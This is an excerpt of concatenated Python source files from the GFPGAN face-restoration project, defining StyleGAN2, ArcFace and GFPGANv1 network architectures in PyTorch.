(f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size},' f' stride={self.stride}, padding={self.padding}, ' f'bias={self.bias is not None})') class ConvLayer(nn.Sequential): """Conv Layer used in StyleGAN2 Discriminator. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Kernel size. downsample (bool): Whether downsample by a factor of 2. Default: False. bias (bool): Whether with bias. Default: True. activate (bool): Whether use activateion. Default: True. """ def __init__(self, in_channels, out_channels, kernel_size, downsample=False, bias=True, activate=True, interpolation_mode='bilinear'): layers = [] self.interpolation_mode = interpolation_mode # downsample if downsample: if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False layers.append( torch.nn.Upsample(scale_factor=0.5, mode=interpolation_mode, align_corners=self.align_corners)) stride = 1 self.padding = kernel_size // 2 # conv layers.append( EqualConv2d( in_channels, out_channels, kernel_size, stride=stride, padding=self.padding, bias=bias and not activate)) # activation if activate: if bias: layers.append(FusedLeakyReLU(out_channels)) else: layers.append(ScaledLeakyReLU(0.2)) super(ConvLayer, self).__init__(*layers) class ResBlock(nn.Module): """Residual block used in StyleGAN2 Discriminator. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. """ def __init__(self, in_channels, out_channels, interpolation_mode='bilinear'): super(ResBlock, self).__init__() self.conv1 = ConvLayer(in_channels, in_channels, 3, bias=True, activate=True) self.conv2 = ConvLayer( in_channels, out_channels, 3, downsample=True, interpolation_mode=interpolation_mode, bias=True, activate=True) self.skip = ConvLayer( in_channels, out_channels, 1, downsample=True, interpolation_mode=interpolation_mode, bias=False, activate=False) def forward(self, x): out = self.conv1(x) out = self.conv2(out) skip = self.skip(x) out = (out + skip) / math.sqrt(2) return out File: gfpgan/archs/arcface_arch.py import torch.nn as nn from basicsr.utils.registry import ARCH_REGISTRY def conv3x3(inplanes, outplanes, stride=1): """A simple wrapper for 3x3 convolution with padding. Args: inplanes (int): Channel number of inputs. outplanes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. """ return nn.Conv2d(inplanes, outplanes, kernel_size=3, stride=stride, padding=1, bias=False) class BasicBlock(nn.Module): """Basic residual block used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. """ expansion = 1 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None): super(BasicBlock, self).__init__() self.conv1 = conv3x3(inplanes, planes, stride) self.bn1 = nn.BatchNorm2d(planes) self.relu = nn.ReLU(inplace=True) self.conv2 = conv3x3(planes, planes) self.bn2 = nn.BatchNorm2d(planes) self.downsample = downsample self.stride = stride def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.relu(out) return out class IRBlock(nn.Module): """Improved residual block (IR Block) used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. use_se (bool): Whether use the SEBlock (squeeze and excitation block). Default: True. """ expansion = 1 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None, use_se=True): super(IRBlock, self).__init__() self.bn0 = nn.BatchNorm2d(inplanes) self.conv1 = conv3x3(inplanes, inplanes) self.bn1 = nn.BatchNorm2d(inplanes) self.prelu = nn.PReLU() self.conv2 = conv3x3(inplanes, planes, stride) self.bn2 = nn.BatchNorm2d(planes) self.downsample = downsample self.stride = stride self.use_se = use_se if self.use_se: self.se = SEBlock(planes) def forward(self, x): residual = x out = self.bn0(x) out = self.conv1(out) out = self.bn1(out) out = self.prelu(out) out = self.conv2(out) out = self.bn2(out) if self.use_se: out = self.se(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.prelu(out) return out class Bottleneck(nn.Module): """Bottleneck block used in the ResNetArcFace architecture. Args: inplanes (int): Channel number of inputs. planes (int): Channel number of outputs. stride (int): Stride in convolution. Default: 1. downsample (nn.Module): The downsample module. Default: None. """ expansion = 4 # output channel expansion ratio def __init__(self, inplanes, planes, stride=1, downsample=None): super(Bottleneck, self).__init__() self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.bn2 = nn.BatchNorm2d(planes) self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False) self.bn3 = nn.BatchNorm2d(planes * self.expansion) self.relu = nn.ReLU(inplace=True) self.downsample = downsample self.stride = stride def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) out = self.relu(out) out = self.conv3(out) out = self.bn3(out) if self.downsample is not None: residual = self.downsample(x) out += residual out = self.relu(out) return out class SEBlock(nn.Module): """The squeeze-and-excitation block (SEBlock) used in the IRBlock. Args: channel (int): Channel number of inputs. reduction (int): Channel reduction ration. Default: 16. """ def __init__(self, channel, reduction=16): super(SEBlock, self).__init__() self.avg_pool = nn.AdaptiveAvgPool2d(1) # pool to 1x1 without spatial information self.fc = nn.Sequential( nn.Linear(channel, channel // reduction), nn.PReLU(), nn.Linear(channel // reduction, channel), nn.Sigmoid()) def forward(self, x): b, c, _, _ = x.size() y = self.avg_pool(x).view(b, c) y = self.fc(y).view(b, c, 1, 1) return x * y @ARCH_REGISTRY.register() class ResNetArcFace(nn.Module): """ArcFace with ResNet architectures. Ref: ArcFace: Additive Angular Margin Loss for Deep Face Recognition. Args: block (str): Block used in the ArcFace architecture. layers (tuple(int)): Block numbers in each layer. use_se (bool): Whether use the SEBlock (squeeze and excitation block). Default: True. """ def __init__(self, block, layers, use_se=True): if block == 'IRBlock': block = IRBlock self.inplanes = 64 self.use_se = use_se super(ResNetArcFace, self).__init__() self.conv1 = nn.Conv2d(1, 64, kernel_size=3, padding=1, bias=False) self.bn1 = nn.BatchNorm2d(64) self.prelu = nn.PReLU() self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2) self.layer1 = self._make_layer(block, 64, layers[0]) self.layer2 = self._make_layer(block, 128, layers[1], stride=2) self.layer3 = self._make_layer(block, 256, layers[2], stride=2) self.layer4 = self._make_layer(block, 512, layers[3], stride=2) self.bn4 = nn.BatchNorm2d(512) self.dropout = nn.Dropout() self.fc5 = nn.Linear(512 * 8 * 8, 512) self.bn5 = nn.BatchNorm1d(512) # initialization for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.xavier_normal_(m.weight) elif isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm1d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) elif isinstance(m, nn.Linear): nn.init.xavier_normal_(m.weight) nn.init.constant_(m.bias, 0) def _make_layer(self, block, planes, num_blocks, stride=1): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] layers.append(block(self.inplanes, planes, stride, downsample, use_se=self.use_se)) self.inplanes = planes for _ in range(1, num_blocks): layers.append(block(self.inplanes, planes, use_se=self.use_se)) return nn.Sequential(*layers) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.prelu(x) x = self.maxpool(x) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = self.layer4(x) x = self.bn4(x) x = self.dropout(x) x = x.view(x.size(0), -1) x = self.fc5(x) x = self.bn5(x) return x File: gfpgan/archs/stylegan2_clean_arch.py import math import random import torch from basicsr.archs.arch_util import default_init_weights from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class NormStyleCode(nn.Module): def forward(self, x): """Normalize the style codes. Args: x (Tensor): Style codes with shape (b, c). Returns: Tensor: Normalized tensor. """ return x * torch.rsqrt(torch.mean(x**2, dim=1, keepdim=True) + 1e-8) class ModulatedConv2d(nn.Module): """Modulated Conv2d used in StyleGAN2. There is no bias in ModulatedConv2d. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether to demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. eps (float): A value added to the denominator for numerical stability. Default: 1e-8. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, eps=1e-8): super(ModulatedConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.demodulate = demodulate self.sample_mode = sample_mode self.eps = eps # modulation inside each modulated conv self.modulation = nn.Linear(num_style_feat, in_channels, bias=True) # initialization default_init_weights(self.modulation, scale=1, bias_fill=1, a=0, mode='fan_in', nonlinearity='linear') self.weight = nn.Parameter( torch.randn(1, out_channels, in_channels, kernel_size, kernel_size) / math.sqrt(in_channels * kernel_size**2)) self.padding = kernel_size // 2 def forward(self, x, style): """Forward function. Args: x (Tensor): Tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). Returns: Tensor: Modulated tensor after convolution. """ b, c, h, w = x.shape # c = c_in # weight modulation style = self.modulation(style).view(b, 1, c, 1, 1) # self.weight: (1, c_out, c_in, k, k); style: (b, 1, c, 1, 1) weight = self.weight * style # (b, c_out, c_in, k, k) if self.demodulate: demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + self.eps) weight = weight * demod.view(b, self.out_channels, 1, 1, 1) weight = weight.view(b * self.out_channels, c, self.kernel_size, self.kernel_size) # upsample or downsample if necessary if self.sample_mode == 'upsample': x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False) elif self.sample_mode == 'downsample': x = F.interpolate(x, scale_factor=0.5, mode='bilinear', align_corners=False) b, c, h, w = x.shape x = x.view(1, b * c, h, w) # weight: (b*c_out, c_in, k, k), groups=b out = F.conv2d(x, weight, padding=self.padding, groups=b) out = out.view(b, self.out_channels, *out.shape[2:4]) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size}, demodulate={self.demodulate}, sample_mode={self.sample_mode})') class StyleConv(nn.Module): """Style conv used in StyleGAN2. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None): super(StyleConv, self).__init__() self.modulated_conv = ModulatedConv2d( in_channels, out_channels, kernel_size, num_style_feat, demodulate=demodulate, sample_mode=sample_mode) self.weight = nn.Parameter(torch.zeros(1)) # for noise injection self.bias = nn.Parameter(torch.zeros(1, out_channels, 1, 1)) self.activate = nn.LeakyReLU(negative_slope=0.2, inplace=True) def forward(self, x, style, noise=None): # modulate out = self.modulated_conv(x, style) * 2**0.5 # for conversion # noise injection if noise is None: b, _, h, w = out.shape noise = out.new_empty(b, 1, h, w).normal_() out = out + self.weight * noise # add bias out = out + self.bias # activation out = self.activate(out) return out class ToRGB(nn.Module): """To RGB (image space) from features. Args: in_channels (int): Channel number of input. num_style_feat (int): Channel number of style features. upsample (bool): Whether to upsample. Default: True. """ def __init__(self, in_channels, num_style_feat, upsample=True): super(ToRGB, self).__init__() self.upsample = upsample self.modulated_conv = ModulatedConv2d( in_channels, 3, kernel_size=1, num_style_feat=num_style_feat, demodulate=False, sample_mode=None) self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) def forward(self, x, style, skip=None): """Forward function. Args: x (Tensor): Feature tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). skip (Tensor): Base/skip tensor. Default: None. Returns: Tensor: RGB images. """ out = self.modulated_conv(x, style) out = out + self.bias if skip is not None: if self.upsample: skip = F.interpolate(skip, scale_factor=2, mode='bilinear', align_corners=False) out = out + skip return out class ConstantInput(nn.Module): """Constant input. Args: num_channel (int): Channel number of constant input. size (int): Spatial size of constant input. """ def __init__(self, num_channel, size): super(ConstantInput, self).__init__() self.weight = nn.Parameter(torch.randn(1, num_channel, size, size)) def forward(self, batch): out = self.weight.repeat(batch, 1, 1, 1) return out @ARCH_REGISTRY.register() class StyleGAN2GeneratorClean(nn.Module): """Clean version of StyleGAN2 Generator. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. narrow (float): Narrow ratio for channels. Default: 1.0. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, narrow=1): super(StyleGAN2GeneratorClean, self).__init__() # Style MLP layers self.num_style_feat = num_style_feat style_mlp_layers = [NormStyleCode()] for i in range(num_mlp): style_mlp_layers.extend( [nn.Linear(num_style_feat, num_style_feat, bias=True), nn.LeakyReLU(negative_slope=0.2, inplace=True)]) self.style_mlp = nn.Sequential(*style_mlp_layers) # initialization default_init_weights(self.style_mlp, scale=1, bias_fill=0, a=0.2, mode='fan_in', nonlinearity='leaky_relu') # channel list channels = { '4': int(512 * narrow), '8': int(512 * narrow), '16': int(512 * narrow), '32': int(512 * narrow), '64': int(256 * channel_multiplier * narrow), '128': int(128 * channel_multiplier * narrow), '256': int(64 * channel_multiplier * narrow), '512': int(32 * channel_multiplier * narrow), '1024': int(16 * channel_multiplier * narrow) } self.channels = channels self.constant_input = ConstantInput(channels['4'], size=4) self.style_conv1 = StyleConv( channels['4'], channels['4'], kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None) self.to_rgb1 = ToRGB(channels['4'], num_style_feat, upsample=False) self.log_size = int(math.log(out_size, 2)) self.num_layers = (self.log_size - 2) * 2 + 1 self.num_latent = self.log_size * 2 - 2 self.style_convs = nn.ModuleList() self.to_rgbs = nn.ModuleList() self.noises = nn.Module() in_channels = channels['4'] # noise for layer_idx in range(self.num_layers): resolution = 2**((layer_idx + 5) // 2) shape = [1, 1, resolution, resolution] self.noises.register_buffer(f'noise{layer_idx}', torch.randn(*shape)) # style convs and to_rgbs for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.style_convs.append( StyleConv( in_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode='upsample')) self.style_convs.append( StyleConv( out_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None)) self.to_rgbs.append(ToRGB(out_channels, num_style_feat, upsample=True)) in_channels = out_channels def make_noise(self): """Make noise for noise injection.""" device = self.constant_input.weight.device noises = [torch.randn(1, 1, 4, 4, device=device)] for i in range(3, self.log_size + 1): for _ in range(2): noises.append(torch.randn(1, 1, 2**i, 2**i, device=device)) return noises def get_latent(self, x): return self.style_mlp(x) def mean_latent(self, num_latent): latent_in = torch.randn(num_latent, self.num_style_feat, device=self.constant_input.weight.device) latent = self.style_mlp(latent_in).mean(0, keepdim=True) return latent def forward(self, styles, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorClean. Args: styles (list[Tensor]): Sample codes of styles. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None File: gfpgan/archs/gfpganv1_arch.py import math import random import torch from basicsr.archs.stylegan2_arch import (ConvLayer, EqualConv2d, EqualLinear, ResBlock, ScaledLeakyReLU, StyleGAN2Generator) from basicsr.ops.fused_act import FusedLeakyReLU from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class StyleGAN2GeneratorSFT(StyleGAN2Generator): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. resample_kernel (list[int]): A list indicating the 1D resample kernel magnitude. A cross production will be applied to extent 1D resample kernel to 2D resample kernel. Default: (1, 3, 3, 1). lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, resample_kernel=(1, 3, 3, 1), lr_mlp=0.01, narrow=1, sft_half=False): super(StyleGAN2GeneratorSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, resample_kernel=resample_kernel, lr_mlp=lr_mlp, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) # the conditions may have fewer levels if i < len(conditions): # SFT part to combine the conditions if self.sft_half: # only apply SFT to half of the channels out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1) out_sft = out_sft * conditions[i - 1] + conditions[i] out = torch.cat([out_same, out_sft], dim=1) else: # apply SFT to all the channels out = out * conditions[i - 1] + conditions[i] out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None class ConvUpLayer(nn.Module): """Convolutional upsampling layer. It uses bilinear upsampler + Conv. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. stride (int): Stride of the convolution. Default: 1 padding (int): Zero-padding added to both sides of the input. Default: 0. bias (bool): If ``True``, adds a learnable bias to the output. Default: ``True``. bias_init_val (float): Bias initialized value. Default: 0. activate (bool): Whether use activateion. Default: True. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True, bias_init_val=0, activate=True): super(ConvUpLayer, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.stride = stride self.padding = padding # self.scale is used to scale the convolution weights, which is related to the common initializations. self.scale = 1 / math.sqrt(in_channels * kernel_size**2) self.weight = nn.Parameter(torch.randn(out_channels, in_channels, kernel_size, kernel_size)) if bias and not activate: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) # activation if activate: if bias: self.activation = FusedLeakyReLU(out_channels) else: self.activation = ScaledLeakyReLU(0.2) else: self.activation = None def forward(self, x): # bilinear upsample out = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False) # conv out = F.conv2d( out, self.weight * self.scale, bias=self.bias, stride=self.stride, padding=self.padding, ) # activation if self.activation is not None: out = self.activation(out) return out class ResUpBlock(nn.Module): """Residual block with upsampling. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. """ def __init__(self, in_channels, out_channels): super(ResUpBlock, self).__init__() self.conv1 = ConvLayer(in_channels, in_channels, 3, bias=True, activate=True) self.conv2 = ConvUpLayer(in_channels, out_channels, 3, stride=1, padding=1, bias=True, activate=True) self.skip = ConvUpLayer(in_channels, out_channels, 1, bias=False, activate=False) def forward(self, x): out = self.conv1(x) out = self.conv2(out) skip = self.skip(x) out = (out + skip) / math.sqrt(2) return out @ARCH_REGISTRY.register() class GFPGANv1(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. resample_kernel (list[int]): A list indicating the 1D resample kernel magnitude. A cross production will be applied to extent 1D resample kernel to 2D resample kernel. Default: (1, 3, 3, 1). decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. input_is_latent (bool): Whether input is latent style. Default: False. different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, resample_kernel=(1, 3, 3, 1), decoder_load_path=None, fix_decoder=True, # for stylegan decoder num_mlp=8, lr_mlp=0.01, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANv1, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = ConvLayer(3, channels[f'{first_out_size}'], 1, bias=True, activate=True) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels, resample_kernel)) in_channels = out_channels self.final_conv = ConvLayer(in_channels, channels['4'], 3, bias=True, activate=True) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResUpBlock(in_channels, out_channels)) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(EqualConv2d(channels[f'{2**i}'], 3, 1, stride=1, padding=0, bias=True, bias_init_val=0)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = EqualLinear( channels['4'] * 4 * 4, linear_out_channel, bias=True, bias_init_val=0, lr_mul=1, activation=None) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, resample_kernel=resample_kernel, lr_mlp=lr_mlp, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=1))) self.condition_shift.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0))) def forward(self, x, return_latents=False, return_rgb=True, randomize_noise=True, **kwargs): """Forward function for GFPGANv1. Args: x (Tensor): Input images. return_latents (bool): Whether to return style latents. Default: False. return_rgb (bool): Whether return intermediate rgb images. Default: True. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. """ conditions = [] unet_skips = [] out_rgbs = [] # encoder feat = self.conv_body_first(x) for i in range(self.log_size - 2): feat = self.conv_body_down[i](feat) unet_skips.insert(0, feat) feat = self.final_conv(feat) # style code style_code = self.final_linear(feat.view(feat.size(0), -1)) if self.different_w: style_code = style_code.view(style_code.size(0), -1, self.num_style_feat) # decode for i in range(self.log_size - 2): # add unet skip feat = feat + unet_skips[i] # ResUpLayer feat = self.conv_body_up[i](feat) # generate scale and shift for SFT layers scale = self.condition_scale[i](feat) conditions.append(scale.clone()) shift = self.condition_shift[i](feat) conditions.append(shift.clone()) # generate rgb images if return_rgb: out_rgbs.append(self.toRGB[i](feat)) # decoder image, _ = self.stylegan_decoder([style_code], conditions, return_latents=return_latents, input_is_latent=self.input_is_latent, randomize_noise=randomize_noise) return image, out_rgbs @ARCH_REGISTRY.register() class FacialComponentDiscriminator(nn.Module): """Facial component (eyes, mouth, noise) discriminator used in GFPGAN. """ def __init__(self): super(FacialComponentDiscriminator, self).__init__() # It now uses a VGG-style architectrue with fixed model size self.conv1 = ConvLayer(3, 64, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True) self.conv2 = ConvLayer(64, 128, 3, downsample=True, resample_kernel=(1, 3, 3, 1), bias=True, activate=True) self.conv3 = ConvLayer(128, 128, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True) self.conv4 = ConvLayer(128, 256, 3, downsample=True, resample_kernel=(1, 3, 3, 1), bias=True, activate=True) self.conv5 = ConvLayer(256, 256, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True) self.final_conv = ConvLayer(256, 1, 3, bias=True, activate=False) def forward(self, x, return_feats=False, **kwargs): """Forward function for FacialComponentDiscriminator. Args: x (Tensor): Input images. return_feats (bool): Whether to return intermediate features. Default: False. """ feat = self.conv1(x) feat = self.conv3(self.conv2(feat)) rlt_feats = [] if return_feats: rlt_feats.append(feat.clone()) feat = self.conv5(self.conv4(feat)) if return_feats: rlt_feats.append(feat.clone()) out = self.final_conv(feat) if return_feats: return out, rlt_feats else: return out, None File: gfpgan/archs/restoreformer_arch.py """Modified from https://github.com/wzhouxiff/RestoreFormer """ import numpy as np import torch import torch.nn as nn import torch.nn.functional as F class VectorQuantizer(nn.Module): """ see https://github.com/MishaLaskin/vqvae/blob/d761a999e2267766400dc646d82d3ac3657771d4/models/quantizer.py ____________________________________________ Discretization bottleneck part of the VQ-VAE. 